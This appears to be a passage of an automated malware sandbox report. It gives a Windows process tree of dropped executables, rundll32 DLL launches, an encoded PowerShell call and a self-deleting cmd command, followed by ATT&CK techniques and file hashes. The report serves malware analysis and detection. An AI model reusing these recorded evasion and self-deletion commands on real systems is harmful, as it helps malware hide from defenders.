                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,4229441788216642219,11229104568541566565,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3296 /prefetch:2
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:6204
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:4328
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun195a1614ec24e6a.exe
                                                                                                                                                                                                                            Sun195a1614ec24e6a.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:4784
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4768 -ip 4768
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                            PID:5416
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4804 -ip 4804
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                            PID:5424
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4744 -ip 4744
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                            PID:5432
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4884 -ip 4884
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                            PID:5660
                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                            PID:6036
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              PID:4812
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4812 -ip 4812
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                            PID:5568
                                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 640 -p 3980 -ip 3980
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                            PID:5964
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 856 -ip 856
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:1672
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4648 -ip 4648
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:4040
                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 676 -p 1280 -ip 1280
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:2804
                                                                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:2156
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 956 -ip 956
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4872
                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:568
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1604 -ip 1604
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:1056
                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                      PID:5872
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:6148
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6148 -s 424
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            PID:6584
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6148 -ip 6148
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:6380
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5200 -ip 5200
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:1804
                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:1280
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6540 -ip 6540
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:7132
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6732 -ip 6732
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:5420
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6856 -ip 6856
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:6604
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F07B.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F07B.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:3940
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F07B.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\F07B.exe
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:988
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2335.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\2335.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:3472
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2335.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2335.exe
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:1052
                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:768
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 5420 -ip 5420
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:3180
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6580 -ip 6580
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:5648
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A789.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\A789.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:5736
                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                PID:3900
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:5448
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 452
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                      PID:5600
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 5448 -ip 5448
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:1736
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\948A.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\948A.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:5492
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 260
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                        PID:5676
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B7B3.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B7B3.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:3084
                                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 3084 -s 1684
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                          PID:6100
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 5492 -ip 5492
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:2676
                                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -pss -s 604 -p 3084 -ip 3084
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:6956
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\F5B7.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\F5B7.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:5060
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\330F.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\330F.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:4648
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\39B7.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\39B7.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:1424
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:1556
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 272
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                    PID:6308
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\4541.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\4541.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:2784
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4541.exe"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:5476
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                          timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                          PID:3000
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\506D.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\506D.exe
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:1508
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:6964
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\506D.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\506D.exe
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:3988
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\80D5.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\80D5.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:1144
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 260
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                PID:5340
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1424 -ip 1424
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:6588
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:6268
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:3484
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1144 -ip 1144
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:6200
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:5304
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1196 -ip 1196
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:6416
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:3288
                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 9CF60ED8B76E0176E5FE2DEEF1B9A301 C
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:4980
                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 1570FDA4BE505E7C62DBACEEA23464B4
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:1552
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                    PID:6888
                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding A2B3E46D7608C56496BEBA1832CB8588 E Global\MSI0000
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:1324
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:5484
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                    PID:832
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:6396
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 452
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                          PID:2068
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6396 -ip 6396
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:6832
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 5080 -ip 5080
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:984

                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                        T1081

                                                                                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                                                                                        5
                                                                                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          568e59b049157be578b13da25b110351

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          7f134a0efd5cda9c2898de51504ba159819ede59

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          98ff038dffbc25ded38d5041a157dc3e8a14b92394358446db4dc3e6d5593ee6

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          c020b4d1bef1bf2be6820dc904b61b314f24dc1809a7e97ab1e3d6ba217ee7b282f70def44879effec54425f000403175725f219eb4d165be422ab104902dc90

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          568e59b049157be578b13da25b110351

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          7f134a0efd5cda9c2898de51504ba159819ede59

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          98ff038dffbc25ded38d5041a157dc3e8a14b92394358446db4dc3e6d5593ee6

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          c020b4d1bef1bf2be6820dc904b61b314f24dc1809a7e97ab1e3d6ba217ee7b282f70def44879effec54425f000403175725f219eb4d165be422ab104902dc90

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun1905815e51282417.exe
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          1aecd083bbec326d90698a79f73749d7

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          1ea884d725caec27aac2b3c0baccfd0c380a414e

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          d5ccebea40a76ec2c82cac45cc208a778269e743f1a825ef881533b85d6c1d31

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          c1044945b17c8f2063a9b95367db93ad6d0f6e316ad9c3b32d2a2259459098b72f85f5569b5a33f7dae68194697c448617e37b6f24558a7ad9cb53b0f382b064

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun1905815e51282417.exe
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          1aecd083bbec326d90698a79f73749d7

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          1ea884d725caec27aac2b3c0baccfd0c380a414e

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          d5ccebea40a76ec2c82cac45cc208a778269e743f1a825ef881533b85d6c1d31

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          c1044945b17c8f2063a9b95367db93ad6d0f6e316ad9c3b32d2a2259459098b72f85f5569b5a33f7dae68194697c448617e37b6f24558a7ad9cb53b0f382b064

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8367590\Sun1908b94df837b3158.exe
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          26c211413dfd432a9ce28c19a67910a1

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          dbf2173faa9e35bb9c710e289a247786248fe9e8

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          e2a9ab13cd3031c7f5c84180de1f62d5905f87094efd8ab654b5fb7d88860e1b

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          4c096e8ed12ebd5ef12b53fb9179fd0c8262837668994a2f2466c61436de95411f05f3af341ac9370448b6e910775b6a3c3a6ddb25850a2b4977c0bc3a3468cd

